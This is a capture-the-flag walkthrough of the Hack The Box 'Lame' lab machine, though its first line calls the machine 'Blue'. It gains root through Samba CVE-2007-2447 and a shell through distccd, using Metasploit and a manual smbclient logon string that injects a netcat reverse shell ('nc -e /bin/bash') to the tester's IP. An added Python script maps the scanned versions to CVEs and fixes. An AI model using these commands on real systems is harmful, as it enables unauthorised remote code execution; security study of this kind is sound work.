Hi Hackers, welcome back. Today we are going to look at the Hack The Box Blue machine.
Info Table
Title: Lame
Category: Hack The Box
OS: Linux
Difficulty: Easy
Maker:
Kill Chain Summary
While enumerating ports and services we find services vulnerable to the infamous CVE-2007-2447 (Samba) and CVE-2004-2687, both of which can be easily exploited with publicly available scripts and Metasploit.
Mind Map
Recon
We run a quick initial nmap scan to see which ports are open and which services are running on them.
All port scan
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]
└──╼ $ nmap -Pn -p- 10.129.99.174 -oN ap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-03 17:46 IST
Stats: 0:08:33 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.62% done; ETC: 17:58 (0:03:33 remaining)
Nmap scan report for 10.129.99.174
Host is up (0.34s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Nmap done: 1 IP address (1 host up) scanned in 1297.12 seconds
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]
└──╼ $ nmap -Pn -sV -sC -A 10.129.99.174 -oN scsva
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-03 17:39 IST
Nmap scan report for 10.129.99.174
Host is up (0.34s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.102
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-06-03T08:10:34-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m27s, deviation: 2h49m46s, median: 24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.40 seconds
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]
└──╼ $ nmap -Pn -A -T4 -p 3632 10.129.99.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-04 02:22 IST
Nmap scan report for 10.129.99.174
Host is up (0.29s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
Services and their versions
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
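As an added example (not part of the original writeup), the Python script below triages the VERSION column of the scan above against the CVEs this writeup names and states the fix a defender would apply. The sample scan lines are constructed from the output shown; the Samba version range and the "username map script" precondition are taken from the CVE-2007-2447 advisory and flagged as assumptions in the comments.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the five service lines from the -sV scan in this writeup.
SCAN_LINES = """\
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""
# nmap -sV columns are PORT STATE SERVICE VERSION; keep the port and the VERSION text.
LINE_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+\S+\s+(.*)$")
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")

def parse_version(version_col: str) -> Optional[Tuple[int, ...]]:
    """First x.y.z in the VERSION column; None when nmap only gave a range like '3.X - 4.X'."""
    m = VERSION_RE.search(version_col)
    return tuple(int(x) for x in m.groups()) if m else None

def classify(version_col: str) -> Optional[Dict[str, str]]:
    """Map a VERSION column to the CVE this writeup ties to it; None when nothing known applies."""
    ver = parse_version(version_col)
    if version_col.startswith("vsftpd"):
        if ver == (2, 3, 4):  # only the trojaned 2.3.4 release carries the backdoor
            return {"cve": "CVE-2011-2523", "fix": "upgrade vsftpd and verify the package signature"}
    elif version_col.startswith("Samba smbd"):
        if ver is None:
            return {"cve": "unresolved", "fix": "banner gave no exact version; use the 445/tcp result"}
        # Assumption from the advisory: 3.0.0 through 3.0.25rc3, only if smb.conf sets 'username map script'.
        if (3, 0, 0) <= ver < (3, 0, 25):
            return {"cve": "CVE-2007-2447", "fix": "upgrade Samba; drop 'username map script' from smb.conf"}
    elif version_col.startswith("distccd"):
        # distccd has no authentication by design, so any reachable instance is exposed.
        return {"cve": "CVE-2004-2687", "fix": "start distccd with --allow <cidr> and firewall 3632/tcp"}
    return None

def triage(scan_output: str) -> List[Dict[str, str]]:
    """One finding per open port whose VERSION column matches a known issue, in scan order."""
    findings = []
    for line in scan_output.splitlines():
        m = LINE_RE.match(line)
        if m and (hit := classify(m.group(2).strip())):
            findings.append({"port": m.group(1), "service": m.group(2).strip(), **hit})
    return findings

if __name__ == "__main__":
    for f in triage(SCAN_LINES):
        print(f"{f['port']}/tcp  {f['cve']:<14} {f['service']}\n    fix: {f['fix']}")
```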
Enumeration port 21
The vsftpd version is vulnerable to CVE-2011-2523. I tried both the Metasploit module and the public exploit, but neither helped; the backdoor has probably been patched.
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]
└──╼ $ ftp 10.129.99.174
Connected to 10.129.99.174.
220 (vsFTPd 2.3.4)
Name (10.129.99.174:atom): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
Exploit Samba (Metasploit)
[msf](Jobs:0 Agents:0) >> search Username script

Matching Modules
================

   #   Name                                                     Disclosure Date  Rank       Check  Description
   -   ----                                                     ---------------  ----       -----  -----------
0 auxiliary/gather/c2s_dvr_password_disclosure 2016-08-19 normal No C2S DVR Management Password Disclosure
1 exploit/windows/http/cyclope_ess_sqli 2012-08-08 excellent Yes Cyclope Employee Surveillance Solution v6 SQL Injection
2 exploit/linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection
3 exploit/linux/http/grandstream_ucm62xx_sendemail_rce 2020-03-23 excellent Yes Grandstream UCM62xx IP PBX sendPasswordEmail RCE
4 auxiliary/gather/ipcamera_password_disclosure 2016-08-16 normal No JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure
5 exploit/linux/local/su_login 1971-11-03 normal Yes Login to Another User with Su on Linux / Unix Systems
6 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
7 auxiliary/scanner/oracle/oracle_login normal No Oracle RDBMS Login Utility
8 auxiliary/server/pxeexploit normal No PXE Boot Exploit Server
9 exploit/multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent Yes SAP Management Console OSExecute Payload Execution
10 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
11 exploit/linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWinds LEM Default SSH Password Remote Code Execution
12 auxiliary/scanner/http/squiz_matrix_user_enum 2011-11-08 normal No Squiz Matrix User Enumeration Scanner
13 exploit/windows/local/wmi_persistence 2017-06-06 normal No WMI Event Subscription Persistence
14 post/windows/manage/pxeexploit normal No Windows Manage PXE Exploit Server
15 auxiliary/gather/wp_ultimate_csv_importer_user_extract 2015-02-02 normal Yes WordPress Ultimate CSV Importer User Table Extract
Interact with a module by name or index. For example info 15, use 15 or use auxiliary/gather/wp_ultimate_csv_importer_user_extract
[msf](Jobs:0 Agents:0) >> use 10
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set rhost 10.129.101.251
rhost=> 10.129.101.251
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set lhost 10.10.14.33
lhost=> 10.10.14.33
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> run
[*] Started reverse TCP handler on 10.10.14.33:4444
[*] Command shell session 1 opened (10.10.14.33:4444 -> 10.129.101.251:47514 ) at 2022-06-07 15:03:37 +0530
whoami
root
id
uid=0(root) gid=0(root)
Manual Method
Enum samba
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]
└──╼ $ smbmap -H 10.129.101.251
[+] IP: 10.129.101.251:445      Name: 10.129.101.251
        Disk        Permissions   Comment
        ----        -----------   -------
        print$      NO ACCESS     Printer Drivers
        tmp         READ, WRITE   oh noes!
        opt         NO ACCESS
        IPC$        NO ACCESS     IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$      NO ACCESS     IPC Service (lame server (Samba 3.0.20-Debian))
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]
└──╼ $ smbclient -N //10.129.101.251/tmp/ --option='client min protocol=NT1'
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Jun  7 15:06:51 2022
  ..                                 DR        0  Sat Oct 31 12:03:58 2020
  5582.jsvc_up                        R        0  Tue Jun  7 07:49:52 2022
  .ICE-unix                          DH        0  Tue Jun  7 07:48:41 2022
  vmware-root                        DR        0  Tue Jun  7 07:49:47 2022
  .X11-unix                          DH        0  Tue Jun  7 07:49:06 2022
  .X0-lock                           HR       11  Tue Jun  7 07:49:06 2022
  vgauthsvclog.txt.0                  R     1600  Tue Jun  7 07:48:40 2022

                7282168 blocks of size 1024. 5384924 blocks available
smb: \> logon _./=`nohup nc -e /bin/bash 10.10.14.33 4444`"
session setup failed: NT_STATUS_LOGON_FAILURE
smb: \> logon _./=`nohup nc -e /bin/bash 10.10.14.33 4444`"
session setup failed: NT_STATUS_LOGON_FAILURE
smb: \> logon "./=`nohup nc -e /bin/bash 10.10.14.33 4444`"
Password:

┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.33] from (UNKNOWN) [10.129.101.251] 38753
whoami
root
id
uid=0(root) gid=0(root)
Enum and Exploit 3632
┌─[atom@atom-vmwarevirtualplatform]─[~/htb/machines/lame]
└──╼ $ nmap -Pn -p 3632 -sV --script vulners 10.129.101.147
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-06 18:24 IST
Nmap scan report for 10.129.101.147
Host is up (0.47s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.52 seconds
[msf](Jobs:0 Agents:0) >> search distccd

Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/misc/distcc_exec

[msf](Jobs:0 Agents:0) >> use 0
[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   7   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   8   payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   9   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   10  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   11  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   12  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   13  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> set payload 5
payload => cmd/unix/reverse
[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> set rhost 10.129.101.251
[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> set lhost 10.10.14.33
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.129.101.251 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3632 yes The target port (TCP)

Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.33 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
[msf](Jobs:0 Agents:0) exploit(unix/misc/distcc_exec) >> run
[*] Started reverse TCP double handler on 10.10.14.33:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo IfVVyVugXAMKqtcu;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 3 opened (10.10.14.33:4444 -> 10.129.101.251:55594 ) at 2022-06-07 14:26:29 +0530
Shell Banner:
IfVVyVugXAMKqtcu
-----
whoami
daemon
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)